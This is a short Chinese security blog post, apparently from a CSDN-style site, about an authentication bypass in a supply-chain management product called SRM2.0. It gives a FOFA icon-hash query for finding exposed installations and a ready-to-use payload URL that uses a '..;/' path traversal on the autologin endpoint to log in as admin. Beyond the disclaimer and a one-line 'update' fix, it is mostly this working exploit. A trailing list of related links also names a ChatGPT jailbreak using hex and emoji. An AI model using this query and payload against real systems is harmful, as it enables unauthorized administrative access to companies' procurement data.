某云彩SRM2.0后台绕过漏洞

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

icon_hash="1665918155"

漏洞描述

某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。

该系统在autologin接口处存在权限绕过漏洞

漏洞复现

payload

http://ip/adpweb/static/..;/api/sys/app/autologin?loginName=admin 

修复建议

更新到最新版本

相关推荐
摸鱼也很难1 天前
RCE 命令执行漏洞 && 过滤模式 && 基本的过滤问题 && 联合ctf题目进行实践
漏洞·ctf·ctfshow·rce命令执行
网络安全成叔11 天前
XSS(跨站攻击)
网络·安全·网络安全·漏洞·xss
渗透测试老鸟-九青13 天前
面试经验分享 | 杭州某安全大厂渗透测试岗
经验分享·安全·网络安全·面试·渗透·漏洞·代码审计
网络研究院25 天前
合规性要求对漏洞管理策略的影响
安全·漏洞·管理·策略·合规
星尘安全2 个月前
安全工程师入侵加密货币交易所获罪
安全·区块链·漏洞·加密货币
渗透测试老鸟-九青2 个月前
【$15000】 通过监控调试模式实现RCE
安全·web安全·网络安全·渗透·漏洞
星尘安全2 个月前
ChatGPT 越狱:研究人员使用十六进制编码和表情符号绕过 AI 保护措施
人工智能·安全·网络安全·chatgpt·漏洞
网络研究院2 个月前
新工具可绕过 Google Chrome 的新 Cookie 加密系统
前端·chrome·系统·漏洞·加密·绕过
SouthBay4932 个月前
【Vulnhub靶场】DC-5
linux·web安全·渗透测试·漏洞·vulnhub靶场